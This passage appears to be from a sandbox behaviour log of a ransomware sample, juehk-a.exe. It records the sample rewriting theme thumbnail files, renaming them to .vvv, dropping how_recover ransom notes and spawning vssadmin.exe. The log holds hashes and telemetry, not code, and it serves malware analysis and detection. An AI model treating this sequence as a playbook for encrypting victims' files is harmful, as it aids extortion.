22554.          ntstatus: 0x0
22555.          CreateOptions: 0x0
22556.        file:
22557.          timestamp: 86087
22558.          mode: created
22559.          sequenceNumber: 1584
22560.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.html
22561.          processinfo:
22562.            pid: 1648
22563.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22564.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22565.            ads:
22566.          fid (ads:): 562949953521317
22567.          ntstatus: 0x0
22568.          CreateOptions: 0x60
22569.        file:
22570.          timestamp: 86093
22571.          mode: close
22572.          sequenceNumber: 1585
22573.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\JOURNAL\how_recover+deg.html
22574.          filesize: 9480
22575.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22576.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22577.          processinfo:
22578.            pid: 1648
22579.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22581.            ads:
22582.          fid (ads:): 562949953521317
22583.          ntstatus: 0x0
22584.          CreateOptions: 0x0
22585.        file:
22586.          timestamp: 86100
22587.          mode: open
22588.          sequenceNumber: 1586
22589.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
22590.          filesize: 44850
22591.          processinfo:
22592.            pid: 1648
22593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22595.            ads:
22596.          fid (ads:): 562949953499631
22597.          ntstatus: 0x0
22598.          CreateOptions: 0x60
22599.        file:
22600.          timestamp: 86140
22601.          mode: close
22602.          sequenceNumber: 1587
22603.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
22604.          filesize: 45278
22605.          md5sum: c85813a647ca4b384f5f017d99e05602
22606.          sha1sum: 60e37a9b34d3e5eca261ccea142a227a514e8db5
22607.          processinfo:
22608.            pid: 1648
22609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22611.            ads:
22612.          fid (ads:): 562949953499631
22613.          ntstatus: 0x0
22614.          CreateOptions: 0x0
22615.        file:
22616.          timestamp: 86149
22617.          mode: rename
22618.          sequenceNumber: 1588
22619.          filesize: 45278
22620.          md5sum: c85813a647ca4b384f5f017d99e05602
22621.          sha1sum: 60e37a9b34d3e5eca261ccea142a227a514e8db5
22622.          processinfo:
22623.            pid: 1648
22624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22626.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG
22627.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\THMBNAIL.PNG.vvv
22628.            ads:
22629.          fid (ads:): 562949953499631
22630.          ntstatus: 0x0
22631.          CreateOptions: 0x0
22632.        file:
22633.          timestamp: 86198
22634.          mode: created
22635.          sequenceNumber: 1589
22636.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.txt
22637.          processinfo:
22638.            pid: 1648
22639.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22640.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22641.            ads:
22642.          fid (ads:): 562949953521318
22643.          ntstatus: 0x0
22644.          CreateOptions: 0x60
22645.        file:
22646.          timestamp: 86204
22647.          mode: close
22648.          sequenceNumber: 1590
22649.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.txt
22650.          filesize: 2673
22651.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22652.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22653.          processinfo:
22654.            pid: 1648
22655.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22656.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22657.            ads:
22658.          fid (ads:): 562949953521318
22659.          ntstatus: 0x0
22660.          CreateOptions: 0x0
22661.        file:
22662.          timestamp: 86216
22663.          mode: created
22664.          sequenceNumber: 1591
22665.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.html
22666.          processinfo:
22667.            pid: 1648
22668.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22669.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22670.            ads:
22671.          fid (ads:): 562949953521319
22672.          ntstatus: 0x0
22673.          CreateOptions: 0x60
22674.        file:
22675.          timestamp: 86220
22676.          mode: close
22677.          sequenceNumber: 1592
22678.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LAYERS\how_recover+deg.html
22679.          filesize: 9480
22680.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22681.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22682.          processinfo:
22683.            pid: 1648
22684.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22686.            ads:
22687.          fid (ads:): 562949953521319
22688.          ntstatus: 0x0
22689.          CreateOptions: 0x0
22690.        file:
22691.          timestamp: 86225
22692.          mode: open
22693.          sequenceNumber: 1593
22694.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
22695.          filesize: 48115
22696.          processinfo:
22697.            pid: 1648
22698.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22700.            ads:
22701.          fid (ads:): 562949953499632
22702.          ntstatus: 0x0
22703.          CreateOptions: 0x60
22704.        file:
22705.          timestamp: 86268
22706.          mode: close
22707.          sequenceNumber: 1594
22708.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
22709.          filesize: 48542
22710.          md5sum: baf501072dfde0c39241e197fd06e7ba
22711.          sha1sum: 76d8f43b3fdbb45b7e6131c57cf89613b92ed7db
22712.          processinfo:
22713.            pid: 1648
22714.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22716.            ads:
22717.          fid (ads:): 562949953499632
22718.          ntstatus: 0x0
22719.          CreateOptions: 0x0
22720.        file:
22721.          timestamp: 86277
22722.          mode: rename
22723.          sequenceNumber: 1595
22724.          filesize: 48542
22725.          md5sum: baf501072dfde0c39241e197fd06e7ba
22726.          sha1sum: 76d8f43b3fdbb45b7e6131c57cf89613b92ed7db
22727.          processinfo:
22728.            pid: 1648
22729.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22731.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG
22732.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\THMBNAIL.PNG.vvv
22733.            ads:
22734.          fid (ads:): 562949953499632
22735.          ntstatus: 0x0
22736.          CreateOptions: 0x0
22737.        file:
22738.          timestamp: 86290
22739.          mode: created
22740.          sequenceNumber: 1596
22741.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.txt
22742.          processinfo:
22743.            pid: 1648
22744.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22746.            ads:
22747.          fid (ads:): 562949953521320
22748.          ntstatus: 0x0
22749.          CreateOptions: 0x60
22750.        file:
22751.          timestamp: 86304
22752.          mode: close
22753.          sequenceNumber: 1597
22754.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.txt
22755.          filesize: 2673
22756.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22757.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22758.          processinfo:
22759.            pid: 1648
22760.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22761.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22762.            ads:
22763.          fid (ads:): 562949953521320
22764.          ntstatus: 0x0
22765.          CreateOptions: 0x0
22766.        file:
22767.          timestamp: 86314
22768.          mode: created
22769.          sequenceNumber: 1598
22770.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.html
22771.          processinfo:
22772.            pid: 1648
22773.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22774.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22775.            ads:
22776.          fid (ads:): 6473924464430764
22777.          ntstatus: 0x0
22778.          CreateOptions: 0x60
22779.        file:
22780.          timestamp: 86318
22781.          mode: close
22782.          sequenceNumber: 1599
22783.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\LEVEL\how_recover+deg.html
22784.          filesize: 9480
22785.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22786.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22787.          processinfo:
22788.            pid: 1648
22789.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22790.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22791.            ads:
22792.          fid (ads:): 6473924464430764
22793.          ntstatus: 0x0
22794.          CreateOptions: 0x0
22795.        file:
22796.          timestamp: 86323
22797.          mode: open
22798.          sequenceNumber: 1600
22799.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
22800.          filesize: 11573
22801.          processinfo:
22802.            pid: 1648
22803.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22804.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22805.            ads:
22806.          fid (ads:): 562949953499633
22807.          ntstatus: 0x0
22808.          CreateOptions: 0x60
22809.        file:
22810.          timestamp: 86331
22811.          mode: close
22812.          sequenceNumber: 1601
22813.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
22814.          filesize: 11998
22815.          md5sum: 70d73359b0071164e5eb26799e13e1c8
22816.          sha1sum: fa5ea850e74c7493278d7fc725510796fa388463
22817.          processinfo:
22818.            pid: 1648
22819.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22820.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22821.            ads:
22822.          fid (ads:): 562949953499633
22823.          ntstatus: 0x0
22824.          CreateOptions: 0x0
22825.        file:
22826.          timestamp: 86337
22827.          mode: rename
22828.          sequenceNumber: 1602
22829.          filesize: 11998
22830.          md5sum: 70d73359b0071164e5eb26799e13e1c8
22831.          sha1sum: fa5ea850e74c7493278d7fc725510796fa388463
22832.          processinfo:
22833.            pid: 1648
22834.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22836.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG
22837.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\THMBNAIL.PNG.vvv
22838.            ads:
22839.          fid (ads:): 562949953499633
22840.          ntstatus: 0x0
22841.          CreateOptions: 0x0
22842.        file:
22843.          timestamp: 86347
22844.          mode: created
22845.          sequenceNumber: 1603
22846.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.txt
22847.          processinfo:
22848.            pid: 1648
22849.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22851.            ads:
22852.          fid (ads:): 562949953521321
22853.          ntstatus: 0x0
22854.          CreateOptions: 0x60
22855.        file:
22856.          timestamp: 86354
22857.          mode: close
22858.          sequenceNumber: 1604
22859.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.txt
22860.          filesize: 2673
22861.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22862.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22863.          processinfo:
22864.            pid: 1648
22865.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22866.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22867.            ads:
22868.          fid (ads:): 562949953521321
22869.          ntstatus: 0x0
22870.          CreateOptions: 0x0
22871.        file:
22872.          timestamp: 86362
22873.          mode: created
22874.          sequenceNumber: 1605
22875.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.html
22876.          processinfo:
22877.            pid: 1648
22878.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22880.            ads:
22881.          fid (ads:): 562949953521322
22882.          ntstatus: 0x0
22883.          CreateOptions: 0x60
22884.        file:
22885.          timestamp: 86369
22886.          mode: close
22887.          sequenceNumber: 1606
22888.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\NETWORK\how_recover+deg.html
22889.          filesize: 9480
22890.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22891.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22892.          processinfo:
22893.            pid: 1648
22894.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22896.            ads:
22897.          fid (ads:): 562949953521322
22898.          ntstatus: 0x0
22899.          CreateOptions: 0x0
22900.        file:
22901.          timestamp: 86377
22902.          mode: open
22903.          sequenceNumber: 1607
22904.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
22905.          filesize: 37440
22906.          processinfo:
22907.            pid: 1648
22908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22910.            ads:
22911.          fid (ads:): 562949953499634
22912.          ntstatus: 0x0
22913.          CreateOptions: 0x60
22914.        file:
22915.          timestamp: 86396
22916.          mode: close
22917.          sequenceNumber: 1608
22918.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
22919.          filesize: 37870
22920.          md5sum: 99ca012a9efd7146ffa08e5e4cf173e0
22921.          sha1sum: c3b0108291f3dd2d490b77ba10d08b6047b0cce5
22922.          processinfo:
22923.            pid: 1648
22924.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22926.            ads:
22927.          fid (ads:): 562949953499634
22928.          ntstatus: 0x0
22929.          CreateOptions: 0x0
22930.        file:
22931.          timestamp: 86404
22932.          mode: rename
22933.          sequenceNumber: 1609
22934.          filesize: 37870
22935.          md5sum: 99ca012a9efd7146ffa08e5e4cf173e0
22936.          sha1sum: c3b0108291f3dd2d490b77ba10d08b6047b0cce5
22937.          processinfo:
22938.            pid: 1648
22939.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22940.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22941.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
22942.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG.vvv
22943.            ads:
22944.          fid (ads:): 562949953499634
22945.          ntstatus: 0x0
22946.          CreateOptions: 0x0
22947.        file:
22948.          timestamp: 86415
22949.          mode: created
22950.          sequenceNumber: 1610
22951.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.txt
22952.          processinfo:
22953.            pid: 1648
22954.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22955.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22956.            ads:
22957.          fid (ads:): 562949953521323
22958.          ntstatus: 0x0
22959.          CreateOptions: 0x60
22960.        file:
22961.          timestamp: 86425
22962.          mode: close
22963.          sequenceNumber: 1611
22964.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.txt
22965.          filesize: 2673
22966.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
22967.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
22968.          processinfo:
22969.            pid: 1648
22970.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22972.            ads:
22973.          fid (ads:): 562949953521323
22974.          ntstatus: 0x0
22975.          CreateOptions: 0x0
22976.        file:
22977.          timestamp: 86437
22978.          mode: created
22979.          sequenceNumber: 1612
22980.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.html
22981.          processinfo:
22982.            pid: 1648
22983.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
22984.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
22985.            ads:
22986.          fid (ads:): 562949953521324
22987.          ntstatus: 0x0
22988.          CreateOptions: 0x60
22989.        file:
22990.          timestamp: 86446
22991.          mode: close
22992.          sequenceNumber: 1613
22993.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.html
22994.          filesize: 9480
22995.          md5sum: a68c3caf0be8f1a393c697136926cfd4
22996.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
22997.          processinfo:
22998.            pid: 1648
22999.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23001.            ads:
23002.          fid (ads:): 562949953521324
23003.          ntstatus: 0x0
23004.          CreateOptions: 0x0
23005.        file:
23006.          timestamp: 86454
23007.          mode: open
23008.          sequenceNumber: 1614
23009.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
23010.          filesize: 21745
23011.          processinfo:
23012.            pid: 1648
23013.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23014.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23015.            ads:
23016.          fid (ads:): 562949953499635
23017.          ntstatus: 0x0
23018.          CreateOptions: 0x60
23019.        file:
23020.          timestamp: 86459
23021.          mode: close
23022.          sequenceNumber: 1615
23023.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
23024.          filesize: 22174
23025.          md5sum: ca1ef629ee1bd8e9074dbf72d20b9496
23026.          sha1sum: f2a291b72498d4a82a9bb42548a8b8d610080497
23027.          processinfo:
23028.            pid: 1648
23029.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23030.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23031.            ads:
23032.          fid (ads:): 562949953499635
23033.          ntstatus: 0x0
23034.          CreateOptions: 0x0
23035.        file:
23036.          timestamp: 86467
23037.          mode: rename
23038.          sequenceNumber: 1616
23039.          filesize: 22174
23040.          md5sum: ca1ef629ee1bd8e9074dbf72d20b9496
23041.          sha1sum: f2a291b72498d4a82a9bb42548a8b8d610080497
23042.          processinfo:
23043.            pid: 1648
23044.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23045.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23046.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
23047.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG.vvv
23048.            ads:
23049.          fid (ads:): 562949953499635
23050.          ntstatus: 0x0
23051.          CreateOptions: 0x0
23052.        file:
23053.          timestamp: 86483
23054.          mode: created
23055.          sequenceNumber: 1617
23056.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.txt
23057.          processinfo:
23058.            pid: 1648
23059.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23061.            ads:
23062.          fid (ads:): 562949953521325
23063.          ntstatus: 0x0
23064.          CreateOptions: 0x60
23065.        file:
23066.          timestamp: 86490
23067.          mode: close
23068.          sequenceNumber: 1618
23069.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.txt
23070.          filesize: 2673
23071.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
23072.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
23073.          processinfo:
23074.            pid: 1648
23075.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23076.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23077.            ads:
23078.          fid (ads:): 562949953521325
23079.          ntstatus: 0x0
23080.          CreateOptions: 0x0
23081.        file:
23082.          timestamp: 86496
23083.          mode: created
23084.          sequenceNumber: 1619
23085.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.html
23086.          processinfo:
23087.            pid: 1648
23088.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23089.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23090.            ads:
23091.          fid (ads:): 562949953521326
23092.          ntstatus: 0x0
23093.          CreateOptions: 0x60
23094.        file:
23095.          timestamp: 86502
23096.          mode: open
23097.          sequenceNumber: 1620
23098.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG
23099.          filesize: 16738
23100.          processinfo:
23101.            pid: 1648
23102.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23103.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23104.            ads:
23105.          fid (ads:): 562949953499636
23106.          ntstatus: 0x0
23107.          CreateOptions: 0x60
23108.        file:
23109.          timestamp: 86540
23110.          mode: rename
23111.          sequenceNumber: 1621
23112.          filesize: 17166
23113.          processinfo:
23114.            pid: 1648
23115.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23116.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23117.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG
23118.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG.vvv
23119.            ads:
23120.          fid (ads:): 562949953499636
23121.          ntstatus: 0x0
23122.          CreateOptions: 0x0
23123.        file:
23124.          timestamp: 86676
23125.          mode: created
23126.          sequenceNumber: 1622
23127.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\how_recover+deg.txt
23128.          processinfo:
23129.            pid: 1648
23130.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23131.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23132.            ads:
23133.          fid (ads:): 562949953521327
23134.          ntstatus: 0x0
23135.          CreateOptions: 0x60
23136.        file:
23137.          timestamp: 86683
23138.          mode: created
23139.          sequenceNumber: 1623
23140.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\how_recover+deg.html
23141.          processinfo:
23142.            pid: 1648
23143.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23144.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23145.            ads:
23146.          fid (ads:): 562949953521328
23147.          ntstatus: 0x0
23148.          CreateOptions: 0x60
23149.        file:
23150.          timestamp: 86689
23151.          mode: open
23152.          sequenceNumber: 1624
23153.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG
23154.          filesize: 37112
23155.          processinfo:
23156.            pid: 1648
23157.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23158.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23159.            ads:
23160.          fid (ads:): 562949953499637
23161.          ntstatus: 0x0
23162.          CreateOptions: 0x60
23163.        file:
23164.          timestamp: 86922
23165.          mode: rename
23166.          sequenceNumber: 1625
23167.          filesize: 37534
23168.          processinfo:
23169.            pid: 1648
23170.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23171.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23172.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG
23173.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG.vvv
23174.            ads:
23175.          fid (ads:): 562949953499637
23176.          ntstatus: 0x0
23177.          CreateOptions: 0x0
23178.        file:
23179.          timestamp: 86976
23180.          mode: created
23181.          sequenceNumber: 1626
23182.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\how_recover+deg.txt
23183.          processinfo:
23184.            pid: 1648
23185.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23186.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23187.            ads:
23188.          fid (ads:): 562949953521329
23189.          ntstatus: 0x0
23190.          CreateOptions: 0x60
23191.        file:
23192.          timestamp: 86980
23193.          mode: created
23194.          sequenceNumber: 1627
23195.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\how_recover+deg.html
23196.          processinfo:
23197.            pid: 1648
23198.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23199.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23200.            ads:
23201.          fid (ads:): 562949953479375
23202.          ntstatus: 0x0
23203.          CreateOptions: 0x60
23204.        process:
23205.          timestamp: 86988
23206.          mode: terminated
23207.          sequenceNumber: 1628
23208.          value: C:\Windows\System32\vssadmin.exe
23209.          pid: 2864
23210.          ppid: 1648
23211.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23212.          cmdline: N/A
23213.            ads:
23214.          fid (ads:): 281474976737319
23215.        file:
23216.          timestamp: 87015
23217.          mode: open
23218.          sequenceNumber: 1629
23219.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG
23220.          filesize: 19563
23221.          processinfo:
23222.            pid: 1648
23223.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23224.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23225.            ads:
23226.          fid (ads:): 562949953499638
23227.          ntstatus: 0x0
23228.          CreateOptions: 0x60
23229.        file:
23230.          timestamp: 87140
23231.          mode: rename
23232.          sequenceNumber: 1630
23233.          filesize: 19982
23234.          processinfo:
23235.            pid: 1648
23236.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23238.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG
23239.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG.vvv
23240.            ads:
23241.          fid (ads:): 562949953499638
23242.          ntstatus: 0x0
23243.          CreateOptions: 0x0
23244.        file:
23245.          timestamp: 87210
23246.          mode: created
23247.          sequenceNumber: 1631
23248.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\how_recover+deg.txt
23249.          processinfo:
23250.            pid: 1648
23251.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23253.            ads:
23254.          fid (ads:): 844424930231059
23255.          ntstatus: 0x0
23256.          CreateOptions: 0x60
23257.        file:
23258.          timestamp: 87215
23259.          mode: created
23260.          sequenceNumber: 1632
23261.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\how_recover+deg.html
23262.          processinfo:
23263.            pid: 1648
23264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23266.            ads:
23267.          fid (ads:): 562949953521330
23268.          ntstatus: 0x0
23269.          CreateOptions: 0x60
23270.        file:
23271.          timestamp: 87222
23272.          mode: open
23273.          sequenceNumber: 1633
23274.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG
23275.          filesize: 15737
23276.          processinfo:
23277.            pid: 1648
23278.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23280.            ads:
23281.          fid (ads:): 562949953499639
23282.          ntstatus: 0x0
23283.          CreateOptions: 0x60
23284.        file:
23285.          timestamp: 87315
23286.          mode: rename
23287.          sequenceNumber: 1634
23288.          filesize: 16158
23289.          processinfo:
23290.            pid: 1648
23291.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23292.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23293.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG
23294.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG.vvv
23295.            ads:
23296.          fid (ads:): 562949953499639
23297.          ntstatus: 0x0
23298.          CreateOptions: 0x0
23299.        file:
23300.          timestamp: 87348
23301.          mode: created
23302.          sequenceNumber: 1635
23303.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\how_recover+deg.txt
